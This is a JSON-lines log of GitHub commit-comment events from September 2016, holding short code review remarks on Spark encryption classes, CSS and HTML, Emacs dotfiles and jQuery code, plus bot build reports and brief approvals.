{"id":"4586672067","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19087830,"position":null,"line":null,"path":null,"commit_id":"00421f20cd8ea3727e2d13d4a7428d370b67c7a8","created_at":"2016-09-19T23:59:52Z","updated_at":"2016-09-19T23:59:52Z","body":"129956421-Scalable-Sizing-HTRad-Heat-Crash (RKStrand) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2363 of 2373 tests passed, 0 test warnings)\n\n * 10 tests had: AUD diffs.\n * 10 tests had: ERR diffs.\n * 7 tests had: Table big diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-00421f20cd8ea3727e2d13d4a7428d370b67c7a8-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-00421f20cd8ea3727e2d13d4a7428d370b67c7a8-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.58%25-yellow.svg)</a> \n"}},"created_at":"2016-09-19T23:59:52Z"}
{"id":"4581174606","type":"CommitCommentEvent","actor":{"login":"nelkaim"},"repo":{"name":"nelkaim/test"},"payload":{"comment":{"id":19073359,"position":15,"line":15,"path":"scoreKeeper.java","commit_id":"3115921ea18b1874164f808a7122ec3405c8471b","created_at":"2016-09-19T03:00:27Z","updated_at":"2016-09-19T03:00:27Z","body":"This is great, but try writing this instead:\r\n```\r\npublic class whatever hahahah\r\n```\r\n"}},"created_at":"2016-09-19T03:00:27Z"}
{"id":"4581175021","type":"CommitCommentEvent","actor":{"login":"nelkaim"},"repo":{"name":"nelkaim/test"},"payload":{"comment":{"id":19073360,"position":15,"line":15,"path":"scoreKeeper.java","commit_id":"3115921ea18b1874164f808a7122ec3405c8471b","created_at":"2016-09-19T03:00:39Z","updated_at":"2016-09-19T03:00:39Z","body":"Good to go 👍 "}},"created_at":"2016-09-19T03:00:39Z"}
{"id":"4581175262","type":"CommitCommentEvent","actor":{"login":"nelkaim"},"repo":{"name":"nelkaim/test"},"payload":{"comment":{"id":19073361,"position":15,"line":15,"path":"scoreKeeper.java","commit_id":"3115921ea18b1874164f808a7122ec3405c8471b","created_at":"2016-09-19T03:00:46Z","updated_at":"2016-09-19T03:00:46Z","body":"Ready to deploy!"}},"created_at":"2016-09-19T03:00:46Z"}
{"id":"4581176854","type":"CommitCommentEvent","actor":{"login":"TotoroWhite"},"repo":{"name":"TotoroWhite/MultiPhotoPicker"},"payload":{"comment":{"id":19073363,"position":null,"line":null,"path":null,"commit_id":"4e5a83e2a9e24d1dfe7e411c49bc4032fd68e49a","created_at":"2016-09-19T03:01:34Z","updated_at":"2016-09-19T03:01:34Z","body":"闪电似的"}},"created_at":"2016-09-19T03:01:34Z"}
{"id":"4581177427","type":"CommitCommentEvent","actor":{"login":"andresfib"},"repo":{"name":"TID-Lab/aggie"},"payload":{"comment":{"id":19073365,"position":69,"line":77,"path":"lib/fetching/content-services/smsgh-content-service.js","commit_id":"907475ed899f7f6a5bb29ac69929fb56f9645739","created_at":"2016-09-19T03:01:52Z","updated_at":"2016-09-19T03:01:52Z","body":"Divide this function in two as in RSS_content_service.js. _parse and _validate. Also, emit errors so that problems are reported."}},"created_at":"2016-09-19T03:01:52Z"}
{"id":"4581181461","type":"CommitCommentEvent","actor":{"login":"munhwan"},"repo":{"name":"munhwan/datasciencecourera"},"payload":{"comment":{"id":19073371,"position":null,"line":null,"path":null,"commit_id":"80726b61596887ed223561904939846ea21bdd6d","created_at":"2016-09-19T03:03:23Z","updated_at":"2016-09-19T03:03:23Z","body":"\"## This is a markdown file\""}},"created_at":"2016-09-19T03:03:23Z"}
{"id":"4581184028","type":"CommitCommentEvent","actor":{"login":"theseankelly"},"repo":{"name":"bitcraze/crazyflie-firmware"},"payload":{"comment":{"id":19073373,"position":null,"line":null,"path":null,"commit_id":"b9b1571d3163c4e130dc97a237e9e3183c5027d7","created_at":"2016-09-19T03:04:40Z","updated_at":"2016-09-19T03:04:40Z","body":"Hey, what's the intended use case for the lightweight gyro bias calculation? Seems risky since it takes a heavy dependency on the quad being stable at first boot. "}},"created_at":"2016-09-19T03:04:40Z"}
{"id":"4581185486","type":"CommitCommentEvent","actor":{"login":"raxod502"},"repo":{"name":"esiefkas/dotfiles"},"payload":{"comment":{"id":19073378,"position":19,"line":276,"path":"init.el","commit_id":"6546396e62ef27ff55bae39084417754c2f85504","created_at":"2016-09-19T03:05:22Z","updated_at":"2016-09-19T03:05:22Z","body":"Why this change? Seems odd to me."}},"created_at":"2016-09-19T03:05:22Z"}
{"id":"4581189336","type":"CommitCommentEvent","actor":{"login":"shuli495"},"repo":{"name":"shuli495/pig_hand_checkHelper"},"payload":{"comment":{"id":19073384,"position":null,"line":null,"path":null,"commit_id":"937e817cc86397554e697e99aab473d96b652e2a","created_at":"2016-09-19T03:07:22Z","updated_at":"2016-09-19T03:07:22Z","body":"init"}},"created_at":"2016-09-19T03:07:22Z"}
{"id":"4581190658","type":"CommitCommentEvent","actor":{"login":"Kyle-Ericson"},"repo":{"name":"Kyle-Ericson/kyleericson.com"},"payload":{"comment":{"id":19073386,"position":null,"line":null,"path":null,"commit_id":"66d9f8aa5b71defac655ed0d677f8f1792aa9845","created_at":"2016-09-19T03:08:02Z","updated_at":"2016-09-19T03:08:02Z","body":"ok"}},"created_at":"2016-09-19T03:08:02Z"}
{"id":"4581191743","type":"CommitCommentEvent","actor":{"login":"vlucky123"},"repo":{"name":"veryyoung/QQLuckyMoney"},"payload":{"comment":{"id":19073387,"position":null,"line":null,"path":null,"commit_id":"fcc2c748c6a3d8b57b715b18adae0e827c92d48e","created_at":"2016-09-19T03:08:32Z","updated_at":"2016-09-19T03:08:32Z","body":"1.0.5和1.0.6安装后微信无法打开，可接受消息，1.0.3和，1.0.4无此问题，框架内不勾选，也没问题，求解决办法，另外口令红包可不可以设置带口令抢。"}},"created_at":"2016-09-19T03:08:32Z"}
{"id":"4581192274","type":"CommitCommentEvent","actor":{"login":"bananabot1024"},"repo":{"name":"evhsnewspaper-cougar-chronicles/evhsnewspaper-cougar-chronicles.github.io"},"payload":{"comment":{"id":19073388,"position":null,"line":null,"path":null,"commit_id":"94a6ff27ecb12ef1da1edf8a5adf8d6726dbd19b","created_at":"2016-09-19T03:08:49Z","updated_at":"2016-09-19T03:08:49Z","body":"why it no work on web but work on local :/"}},"created_at":"2016-09-19T03:08:49Z"}
{"id":"4581192718","type":"CommitCommentEvent","actor":{"login":"bananabot1024"},"repo":{"name":"evhsnewspaper-cougar-chronicles/evhsnewspaper-cougar-chronicles.github.io"},"payload":{"comment":{"id":19073390,"position":null,"line":null,"path":null,"commit_id":"94a6ff27ecb12ef1da1edf8a5adf8d6726dbd19b","created_at":"2016-09-19T03:09:05Z","updated_at":"2016-09-19T03:09:05Z","body":"just kidding it works"}},"created_at":"2016-09-19T03:09:05Z"}
{"id":"4581193060","type":"CommitCommentEvent","actor":{"login":"raxod502"},"repo":{"name":"esiefkas/dotfiles"},"payload":{"comment":{"id":19073391,"position":7,"line":81,"path":"init.el","commit_id":"6546396e62ef27ff55bae39084417754c2f85504","created_at":"2016-09-19T03:09:16Z","updated_at":"2016-09-19T03:09:16Z","body":"This should be in `init.local.el`. But I am curious—is the problem that with your color scheme, the cursor and the highlight have similar colors? I had to change the highlight color because the default looked horrible, but this fix is specific to my color scheme and is of course disabled when you turn off `radon-tweak-colors`.\r\n\r\nI would be very open to changing `radon-tweak-colors` into `radon-color-scheme`, which could allow you to use either `solarized-light` (mine), or a dark theme like you use (so that other people on the Dark Side could have a colors-work-out-of-the-box Emacs). Then the various color-scheme tweaks I have (search for uses of `radon-tweak-colors`) could be customized to one of several \"guaranteed to at least sort of work\" color schemes."}},"created_at":"2016-09-19T03:09:16Z"}
{"id":"4581197873","type":"CommitCommentEvent","actor":{"login":"dzhuowen"},"repo":{"name":"facebook/react-native-fbsdk"},"payload":{"comment":{"id":19073396,"position":null,"line":null,"path":null,"commit_id":"9c63f00a849de685ccae73f57b79ec12a760d53a","created_at":"2016-09-19T03:11:50Z","updated_at":"2016-09-19T03:11:50Z","body":"rnpm has been included in  rn cli. See https://github.com/rnpm/rnpm.  But you should still be able use the rnpm command. We update here to be inline with react native."}},"created_at":"2016-09-19T03:11:50Z"}
{"id":"4581198311","type":"CommitCommentEvent","actor":{"login":"UDEZUE"},"repo":{"name":"UDEZUE/datasciencecoursera"},"payload":{"comment":{"id":19073397,"position":null,"line":null,"path":null,"commit_id":"8fb61cdce21553bcfe95b35be765c2ec9d8f57f6","created_at":"2016-09-19T03:12:07Z","updated_at":"2016-09-19T03:12:07Z","body":"https://github.com/UDEZUE/datasciencecoursera/commit/8fb61cdce21553bcfe95b35be765c2ec9d8f57f6"}},"created_at":"2016-09-19T03:12:07Z"}
{"id":"4581200162","type":"CommitCommentEvent","actor":{"login":"vlucky123"},"repo":{"name":"veryyoung/QQLuckyMoney"},"payload":{"comment":{"id":19073400,"position":null,"line":null,"path":null,"commit_id":"fcc2c748c6a3d8b57b715b18adae0e827c92d48e","created_at":"2016-09-19T03:13:05Z","updated_at":"2016-09-19T03:13:05Z","body":"1.0.5和1.0.6安装后微信无法打开，可接受消息，1.0.3和，1.0.4无此问题，框架内不勾选，也没问题，求解决办法，另外口令红包可不可以设置带口令抢。"}},"created_at":"2016-09-19T03:13:05Z"}
{"id":"4581201881","type":"CommitCommentEvent","actor":{"login":"wanghailong0319"},"repo":{"name":"wanghailong0319/wanghailong0319.github.io"},"payload":{"comment":{"id":19073402,"position":270,"line":270,"path":"game.html","commit_id":"156e9acccc5e5d44c7b8d965b8f31fa3eb599e4a","created_at":"2016-09-19T03:13:56Z","updated_at":"2016-09-19T03:13:56Z","body":"e"}},"created_at":"2016-09-19T03:13:56Z"}
{"id":"4581203758","type":"CommitCommentEvent","actor":{"login":"mfaywu"},"repo":{"name":"mfaywu/job-search-tool"},"payload":{"comment":{"id":19073404,"position":null,"line":null,"path":null,"commit_id":"0d6a23adf0dcb6a898fb572a1bbfd58676de7e8f","created_at":"2016-09-19T03:14:56Z","updated_at":"2016-09-19T03:14:56Z","body":"#3 MVP Done!"}},"created_at":"2016-09-19T03:14:56Z"}
{"id":"4581209559","type":"CommitCommentEvent","actor":{"login":"nickbradley"},"repo":{"name":"CS310-2016Fall/cpsc310project"},"payload":{"comment":{"id":19073412,"position":null,"line":null,"path":null,"commit_id":"2048127309864abe0aee1ce0133a17a0c33965ae","created_at":"2016-09-19T03:17:52Z","updated_at":"2016-09-19T03:17:52Z","body":"@CPSC310Bot "}},"created_at":"2016-09-19T03:17:52Z"}
{"id":"4581212462","type":"CommitCommentEvent","actor":{"login":"winningsix"},"repo":{"name":"cjjnjust/spark"},"payload":{"comment":{"id":19073417,"position":121,"line":157,"path":"common/network-common/src/main/java/org/apache/spark/network/sasl/SaslRpcHandler.java","commit_id":"730c164e33221af536280e4f5217ce17e01fba0b","created_at":"2016-09-19T03:19:25Z","updated_at":"2016-09-19T03:19:25Z","body":"No need for this removal."}},"created_at":"2016-09-19T03:19:25Z"}
{"id":"4581212802","type":"CommitCommentEvent","actor":{"login":"winningsix"},"repo":{"name":"cjjnjust/spark"},"payload":{"comment":{"id":19073418,"position":4,"line":35,"path":"common/network-common/src/main/java/org/apache/spark/network/sasl/SparkSaslClient.java","commit_id":"730c164e33221af536280e4f5217ce17e01fba0b","created_at":"2016-09-19T03:19:37Z","updated_at":"2016-09-19T03:19:37Z","body":"Wrong place for this import."}},"created_at":"2016-09-19T03:19:37Z"}
{"id":"4581212977","type":"CommitCommentEvent","actor":{"login":"raxod502"},"repo":{"name":"esiefkas/dotfiles"},"payload":{"comment":{"id":19073420,"position":4,"line":4,"path":"scripts/install-lein-linux.sh","commit_id":"fb64d9a8bedd4602029e11e597a9c0e8a2067496","created_at":"2016-09-19T03:19:43Z","updated_at":"2016-09-19T03:19:43Z","body":"On another note, `./lein` can be replaced with `lein`."}},"created_at":"2016-09-19T03:19:43Z"}
{"id":"4581213195","type":"CommitCommentEvent","actor":{"login":"winningsix"},"repo":{"name":"cjjnjust/spark"},"payload":{"comment":{"id":19073422,"position":21,"line":153,"path":"common/network-common/src/main/java/org/apache/spark/network/sasl/SparkSaslClient.java","commit_id":"730c164e33221af536280e4f5217ce17e01fba0b","created_at":"2016-09-19T03:19:51Z","updated_at":"2016-09-19T03:19:51Z","body":"Extra line."}},"created_at":"2016-09-19T03:19:51Z"}
{"id":"4581213735","type":"CommitCommentEvent","actor":{"login":"raxod502"},"repo":{"name":"esiefkas/dotfiles"},"payload":{"comment":{"id":19073424,"position":19,"line":276,"path":"init.el","commit_id":"6546396e62ef27ff55bae39084417754c2f85504","created_at":"2016-09-19T03:20:09Z","updated_at":"2016-09-19T03:20:09Z","body":"I see, you switched the file names. The reason I made it the way it was originally was so that each program's \"general override file\" (which would be run at the end, and would be where you would put anything that wouldn't need to be \"injected\" at a particular point) would only be the regular name plus `local`, without any additional pre/suffixes (like `post`). Thoughts?"}},"created_at":"2016-09-19T03:20:09Z"}
{"id":"4581214477","type":"CommitCommentEvent","actor":{"login":"winningsix"},"repo":{"name":"cjjnjust/spark"},"payload":{"comment":{"id":19073425,"position":24,"line":41,"path":"common/network-common/src/main/java/org/apache/spark/network/sasl/SparkSaslServer.java","commit_id":"730c164e33221af536280e4f5217ce17e01fba0b","created_at":"2016-09-19T03:20:32Z","updated_at":"2016-09-19T03:20:32Z","body":"Wrong place for this import."}},"created_at":"2016-09-19T03:20:32Z"}
{"id":"4581215089","type":"CommitCommentEvent","actor":{"login":"mfaywu"},"repo":{"name":"mfaywu/job-search-tool"},"payload":{"comment":{"id":19073426,"position":null,"line":null,"path":null,"commit_id":"172a04430ace9fce8527ddb9798ec1fc92ce342f","created_at":"2016-09-19T03:20:53Z","updated_at":"2016-09-19T03:20:53Z","body":"#17 Done!"}},"created_at":"2016-09-19T03:20:53Z"}
{"id":"4581215639","type":"CommitCommentEvent","actor":{"login":"luofen"},"repo":{"name":"luofen/payment"},"payload":{"comment":{"id":19073427,"position":null,"line":null,"path":null,"commit_id":"8017b85ecb572ca13f1f0599bba9198267efced4","created_at":"2016-09-19T03:21:10Z","updated_at":"2016-09-19T03:21:10Z","body":"hahaha"}},"created_at":"2016-09-19T03:21:10Z"}
{"id":"4581215724","type":"CommitCommentEvent","actor":{"login":"mfaywu"},"repo":{"name":"mfaywu/job-search-tool"},"payload":{"comment":{"id":19073429,"position":null,"line":null,"path":null,"commit_id":"eab9b5434f03e9c764c82defb523c52bf50ca3d6","created_at":"2016-09-19T03:21:13Z","updated_at":"2016-09-19T03:21:13Z","body":"#17 Initial Commit"}},"created_at":"2016-09-19T03:21:13Z"}
{"id":"4581216225","type":"CommitCommentEvent","actor":{"login":"winningsix"},"repo":{"name":"cjjnjust/spark"},"payload":{"comment":{"id":19073430,"position":38,"line":38,"path":"common/network-common/src/main/java/org/apache/spark/network/sasl/aes/CipherOption.java","commit_id":"730c164e33221af536280e4f5217ce17e01fba0b","created_at":"2016-09-19T03:21:31Z","updated_at":"2016-09-19T03:21:31Z","body":"Is this constructor needed? Looks no other place uses it."}},"created_at":"2016-09-19T03:21:31Z"}
{"id":"4581217766","type":"CommitCommentEvent","actor":{"login":"winningsix"},"repo":{"name":"cjjnjust/spark"},"payload":{"comment":{"id":19073434,"position":70,"line":70,"path":"common/network-common/src/main/java/org/apache/spark/network/sasl/aes/CipherOption.java","commit_id":"730c164e33221af536280e4f5217ce17e01fba0b","created_at":"2016-09-19T03:22:21Z","updated_at":"2016-09-19T03:22:21Z","body":"Please add Java Doc for the public methods of this class."}},"created_at":"2016-09-19T03:22:21Z"}
{"id":"4581218233","type":"CommitCommentEvent","actor":{"login":"winningsix"},"repo":{"name":"cjjnjust/spark"},"payload":{"comment":{"id":19073435,"position":38,"line":38,"path":"common/network-common/src/main/java/org/apache/spark/network/sasl/aes/SparkAesCipher.java","commit_id":"730c164e33221af536280e4f5217ce17e01fba0b","created_at":"2016-09-19T03:22:36Z","updated_at":"2016-09-19T03:22:36Z","body":"Wrong place for these two import."}},"created_at":"2016-09-19T03:22:36Z"}
{"id":"4581218313","type":"CommitCommentEvent","actor":{"login":"gadiex"},"repo":{"name":"gadiex/github-for-web-designers"},"payload":{"comment":{"id":19073437,"position":4,"line":5,"path":"README.md","commit_id":"200d6663c77378f2a87430e17d09e9d26807005b","created_at":"2016-09-19T03:22:38Z","updated_at":"2016-09-19T03:22:38Z","body":"nothing to worry about"}},"created_at":"2016-09-19T03:22:38Z"}
{"id":"4581218956","type":"CommitCommentEvent","actor":{"login":"wdjunaidi"},"repo":{"name":"marionettejs/backbone.wreqr"},"payload":{"comment":{"id":19073438,"position":null,"line":null,"path":null,"commit_id":"b14ba8158d6604154d44b65ca4e363eb8933da1f","created_at":"2016-09-19T03:22:58Z","updated_at":"2016-09-19T03:22:58Z","body":"No build is done, so the download link on _README_ is still downloaing 1.3.6 version."}},"created_at":"2016-09-19T03:22:58Z"}
{"id":"4581220584","type":"CommitCommentEvent","actor":{"login":"kimgoulb"},"repo":{"name":"gsofia/personal-website"},"payload":{"comment":{"id":19073439,"position":26,"line":26,"path":"about.html","commit_id":"e5e73053f94c608525ba7f20dee3f528512f9f83","created_at":"2016-09-19T03:23:53Z","updated_at":"2016-09-19T03:23:53Z","body":"Instead of using a <br/> tag here, I would just use margin-bottom on the <div> to get the spacing below."}},"created_at":"2016-09-19T03:23:53Z"}
{"id":"4581220603","type":"CommitCommentEvent","actor":{"login":"dhylands"},"repo":{"name":"micropython/micropython"},"payload":{"comment":{"id":19073440,"position":null,"line":null,"path":null,"commit_id":"4b3f1d712b845a44a0d2680197cfb6c3fe4478bd","created_at":"2016-09-19T03:23:53Z","updated_at":"2016-09-19T03:23:53Z","body":"I'm not familiar with the MCU on the ESP8266, but to do this on ARM you need to disable interrupts, check for any chars and the do a WFI. Otherwise there is a race where the interrupt comes in just before the WFI and you wind up waiting for an interrupt when a character has just been received."}},"created_at":"2016-09-19T03:23:53Z"}
{"id":"4581221424","type":"CommitCommentEvent","actor":{"login":"winningsix"},"repo":{"name":"cjjnjust/spark"},"payload":{"comment":{"id":19073441,"position":63,"line":63,"path":"common/network-common/src/main/java/org/apache/spark/network/sasl/aes/SparkAesCipher.java","commit_id":"730c164e33221af536280e4f5217ce17e01fba0b","created_at":"2016-09-19T03:24:20Z","updated_at":"2016-09-19T03:24:20Z","body":"Hint： maybe we can add a method to check validation of the transformation. If failed, just throws an Exception like invalid transformation."}},"created_at":"2016-09-19T03:24:20Z"}
{"id":"4581222558","type":"CommitCommentEvent","actor":{"login":"brambledn"},"repo":{"name":"lianshang/code-review-fe"},"payload":{"comment":{"id":19073443,"position":70,"line":70,"path":"shishuo/line-monitoring-model.js","commit_id":"10e74a705b7aff8eda20a018ac621a6f6de22964","created_at":"2016-09-19T03:24:53Z","updated_at":"2016-09-19T03:24:53Z","body":"$.extend这种用法就不需要再赋值了吧～～"}},"created_at":"2016-09-19T03:24:53Z"}
{"id":"4581223551","type":"CommitCommentEvent","actor":{"login":"uldisn"},"repo":{"name":"schmunk42/yii2-giiant"},"payload":{"comment":{"id":19073445,"position":null,"line":null,"path":null,"commit_id":"cbe3741418b746fca59beb521a80794d1edc3a26","created_at":"2016-09-19T03:25:25Z","updated_at":"2016-09-19T03:25:25Z","body":"In Gii generateRelationsFromCurrentSchema property added: https://github.com/yiisoft/yii2-gii/commit/fb52694ec523bb82ca73e0173f1b96c5c2ff3d5d"}},"created_at":"2016-09-19T03:25:25Z"}
{"id":"4581224165","type":"CommitCommentEvent","actor":{"login":"winningsix"},"repo":{"name":"cjjnjust/spark"},"payload":{"comment":{"id":19073446,"position":101,"line":101,"path":"common/network-common/src/main/java/org/apache/spark/network/sasl/aes/SparkAesCipher.java","commit_id":"730c164e33221af536280e4f5217ce17e01fba0b","created_at":"2016-09-19T03:25:44Z","updated_at":"2016-09-19T03:25:44Z","body":"Remove this comment or explain it further. MAC is too simply and doesn't provide additional information."}},"created_at":"2016-09-19T03:25:44Z"}
{"id":"4581225866","type":"CommitCommentEvent","actor":{"login":"winningsix"},"repo":{"name":"cjjnjust/spark"},"payload":{"comment":{"id":19073448,"position":130,"line":130,"path":"common/network-common/src/main/java/org/apache/spark/network/sasl/aes/SparkAesCipher.java","commit_id":"730c164e33221af536280e4f5217ce17e01fba0b","created_at":"2016-09-19T03:26:36Z","updated_at":"2016-09-19T03:26:36Z","body":"```encrypted.length-4``` need some spaces around ```-```"}},"created_at":"2016-09-19T03:26:36Z"}
{"id":"4581227127","type":"CommitCommentEvent","actor":{"login":"kimgoulb"},"repo":{"name":"gsofia/personal-website"},"payload":{"comment":{"id":19073450,"position":11,"line":11,"path":"css/style.css","commit_id":"e5e73053f94c608525ba7f20dee3f528512f9f83","created_at":"2016-09-19T03:27:12Z","updated_at":"2016-09-19T03:27:12Z","body":"Avenir isn't a standard font so you would need to use @fontface or an online service like google fonts to make this work on everyone's laptop. (Just like you did with Roboto)."}},"created_at":"2016-09-19T03:27:12Z"}
{"id":"4581227496","type":"CommitCommentEvent","actor":{"login":"winningsix"},"repo":{"name":"cjjnjust/spark"},"payload":{"comment":{"id":19073451,"position":1,"line":1,"path":"common/network-common/src/main/java/org/apache/spark/network/sasl/aes/SparkAesSaslClient.java","commit_id":"730c164e33221af536280e4f5217ce17e01fba0b","created_at":"2016-09-19T03:27:25Z","updated_at":"2016-09-19T03:27:25Z","body":"Apache license please"}},"created_at":"2016-09-19T03:27:25Z"}
{"id":"4581227656","type":"CommitCommentEvent","actor":{"login":"kimgoulb"},"repo":{"name":"gsofia/personal-website"},"payload":{"comment":{"id":19073452,"position":17,"line":17,"path":"css/style.css","commit_id":"e5e73053f94c608525ba7f20dee3f528512f9f83","created_at":"2016-09-19T03:27:30Z","updated_at":"2016-09-19T03:27:30Z","body":"Missing semi-colon at the end here."}},"created_at":"2016-09-19T03:27:30Z"}
{"id":"4581228106","type":"CommitCommentEvent","actor":{"login":"winningsix"},"repo":{"name":"cjjnjust/spark"},"payload":{"comment":{"id":19073453,"position":19,"line":19,"path":"common/network-common/src/main/java/org/apache/spark/network/sasl/aes/SparkAesSaslClient.java","commit_id":"730c164e33221af536280e4f5217ce17e01fba0b","created_at":"2016-09-19T03:27:43Z","updated_at":"2016-09-19T03:27:43Z","body":"Please add some comments for this class."}},"created_at":"2016-09-19T03:27:43Z"}
{"id":"4581229002","type":"CommitCommentEvent","actor":{"login":"kimgoulb"},"repo":{"name":"gsofia/personal-website"},"payload":{"comment":{"id":19073454,"position":47,"line":47,"path":"css/style.css","commit_id":"e5e73053f94c608525ba7f20dee3f528512f9f83","created_at":"2016-09-19T03:28:10Z","updated_at":"2016-09-19T03:28:10Z","body":"The hashtag is only for hex values so it's either \"black\" or \"#000\"."}},"created_at":"2016-09-19T03:28:10Z"}
{"id":"4581229124","type":"CommitCommentEvent","actor":{"login":"mfaywu"},"repo":{"name":"mfaywu/job-search-tool"},"payload":{"comment":{"id":19073455,"position":null,"line":null,"path":null,"commit_id":"2bb39c50216ca68675ede17a9b95d06857601a61","created_at":"2016-09-19T03:28:13Z","updated_at":"2016-09-19T03:28:13Z","body":"#8 Added mongodb collection"}},"created_at":"2016-09-19T03:28:13Z"}
{"id":"4581230083","type":"CommitCommentEvent","actor":{"login":"winningsix"},"repo":{"name":"cjjnjust/spark"},"payload":{"comment":{"id":19073457,"position":47,"line":47,"path":"common/network-common/src/main/java/org/apache/spark/network/sasl/aes/SparkAesSaslClient.java","commit_id":"730c164e33221af536280e4f5217ce17e01fba0b","created_at":"2016-09-19T03:28:40Z","updated_at":"2016-09-19T03:28:40Z","body":"Hint: change it to debug since it happens too often."}},"created_at":"2016-09-19T03:28:40Z"}
{"id":"4581230472","type":"CommitCommentEvent","actor":{"login":"cdrsir"},"repo":{"name":"itext/itext7-samples"},"payload":{"comment":{"id":19073458,"position":null,"line":null,"path":null,"commit_id":"3710a5485a530f7b8c2129b4f70c6f17766b86f2","created_at":"2016-09-19T03:28:53Z","updated_at":"2016-09-19T03:28:53Z","body":"As a newbie to iText7, could someone helps to explain what does \"UpdatePageRenderer()\"?"}},"created_at":"2016-09-19T03:28:53Z"}
{"id":"4581230808","type":"CommitCommentEvent","actor":{"login":"Pocketkid2"},"repo":{"name":"APDevTeam/iFill"},"payload":{"comment":{"id":19073459,"position":null,"line":null,"path":null,"commit_id":"dbd11c3762541b8529daa376b4d5e86788b095c9","created_at":"2016-09-19T03:29:04Z","updated_at":"2016-09-19T03:29:04Z","body":"Why?"}},"created_at":"2016-09-19T03:29:04Z"}
{"id":"4581231601","type":"CommitCommentEvent","actor":{"login":"winningsix"},"repo":{"name":"cjjnjust/spark"},"payload":{"comment":{"id":19073460,"position":57,"line":57,"path":"common/network-common/src/main/java/org/apache/spark/network/sasl/aes/SparkAesSaslClient.java","commit_id":"730c164e33221af536280e4f5217ce17e01fba0b","created_at":"2016-09-19T03:29:30Z","updated_at":"2016-09-19T03:29:30Z","body":"No other place use this variable except the followings. Just instantiate it below."}},"created_at":"2016-09-19T03:29:30Z"}
{"id":"4581231915","type":"CommitCommentEvent","actor":{"login":"winningsix"},"repo":{"name":"cjjnjust/spark"},"payload":{"comment":{"id":19073461,"position":62,"line":62,"path":"common/network-common/src/main/java/org/apache/spark/network/sasl/aes/SparkAesSaslClient.java","commit_id":"730c164e33221af536280e4f5217ce17e01fba0b","created_at":"2016-09-19T03:29:40Z","updated_at":"2016-09-19T03:29:40Z","body":"Hint: debug?"}},"created_at":"2016-09-19T03:29:40Z"}
{"id":"4581232295","type":"CommitCommentEvent","actor":{"login":"mchome"},"repo":{"name":"drcoms/jlu-drcom-client"},"payload":{"comment":{"id":19073462,"position":null,"line":null,"path":null,"commit_id":"26d56c940e7482a7319a86f9aa17e6ec12e1e3ef","created_at":"2016-09-19T03:29:52Z","updated_at":"2016-09-19T03:29:52Z","body":"网线断了wwwwwwwwwwwwww"}},"created_at":"2016-09-19T03:29:52Z"}
{"id":"4581232358","type":"CommitCommentEvent","actor":{"login":"Pocketkid2"},"repo":{"name":"APDevTeam/iFill"},"payload":{"comment":{"id":19073463,"position":null,"line":null,"path":null,"commit_id":"7c11e88c0208e7c03e59b3eb947f016747e85774","created_at":"2016-09-19T03:29:55Z","updated_at":"2016-09-19T03:29:55Z","body":":thumbsup:"}},"created_at":"2016-09-19T03:29:55Z"}
{"id":"4581232748","type":"CommitCommentEvent","actor":{"login":"Pocketkid2"},"repo":{"name":"APDevTeam/iFill"},"payload":{"comment":{"id":19073464,"position":null,"line":null,"path":null,"commit_id":"99473527c47b6febb7966fc8474e42a9b5b86055","created_at":"2016-09-19T03:30:05Z","updated_at":"2016-09-19T03:30:05Z","body":":thumbsup:"}},"created_at":"2016-09-19T03:30:05Z"}
{"id":"4581232770","type":"CommitCommentEvent","actor":{"login":"kimgoulb"},"repo":{"name":"gsofia/personal-website"},"payload":{"comment":{"id":19073465,"position":22,"line":21,"path":"index.html","commit_id":"e5e73053f94c608525ba7f20dee3f528512f9f83","created_at":"2016-09-19T03:30:06Z","updated_at":"2016-09-19T03:30:06Z","body":"You should close this paragraph tag here and open the other one after the list."}},"created_at":"2016-09-19T03:30:06Z"}
{"id":"4581232833","type":"CommitCommentEvent","actor":{"login":"winningsix"},"repo":{"name":"cjjnjust/spark"},"payload":{"comment":{"id":19073466,"position":1,"line":1,"path":"common/network-common/src/main/java/org/apache/spark/network/sasl/aes/SparkAesSaslServer.java","commit_id":"730c164e33221af536280e4f5217ce17e01fba0b","created_at":"2016-09-19T03:30:07Z","updated_at":"2016-09-19T03:30:07Z","body":"Apache license header please."}},"created_at":"2016-09-19T03:30:07Z"}
{"id":"4581233040","type":"CommitCommentEvent","actor":{"login":"hycugb"},"repo":{"name":"lianshang/code-review-fe"},"payload":{"comment":{"id":19073467,"position":446,"line":446,"path":"shishuo/line-monitoring-model.js","commit_id":"10e74a705b7aff8eda20a018ac621a6f6de22964","created_at":"2016-09-19T03:30:12Z","updated_at":"2016-09-19T03:30:12Z","body":"假如我写这块功能的时候，我会这样去实现：\r\n在syncData函数的ajax请求外层定义一个Deferred对象，\r\n\r\nfn.syncData = function ( action , params){\r\n    var error = '操作失败!';\r\n    Loading.show( \"正在加载...\" );\r\n\tvar dtd = $.Deferred();\r\n    $.ajax({\r\n        url: '/order/'+action,\r\n        data: params,\r\n        type: 'GET',\r\n        dataType: 'json'\r\n    }).done(function (response) {\r\n        if(response){\r\n            if (response.ret === 0) {\r\n               dtd.resolve(response.content);\r\n            } else {\r\n               dtd.reject(response.msg || error);\r\n            }\r\n        }else{\r\n            dtd.reject(response.msg || error);\r\n        }\r\n    }).fail( function () {\r\n        dtd.reject(error);\r\n    } );\r\n\r\n    return dtd.promise();\r\n}\r\n\r\n然后在调用syncData时通过done和fail来处理不同的返回状态，\r\nsyncData函数仅仅做获取数据的工作，剩下的逻辑处理交给其他\r\n调用的函数做"}},"created_at":"2016-09-19T03:30:12Z"}
{"id":"4581233065","type":"CommitCommentEvent","actor":{"login":"Pocketkid2"},"repo":{"name":"APDevTeam/iFill"},"payload":{"comment":{"id":19073468,"position":null,"line":null,"path":null,"commit_id":"1e6cc51471e1a778d924c516c56de9a721a44e0f","created_at":"2016-09-19T03:30:12Z","updated_at":"2016-09-19T03:30:12Z","body":":thumbsup:"}},"created_at":"2016-09-19T03:30:12Z"}
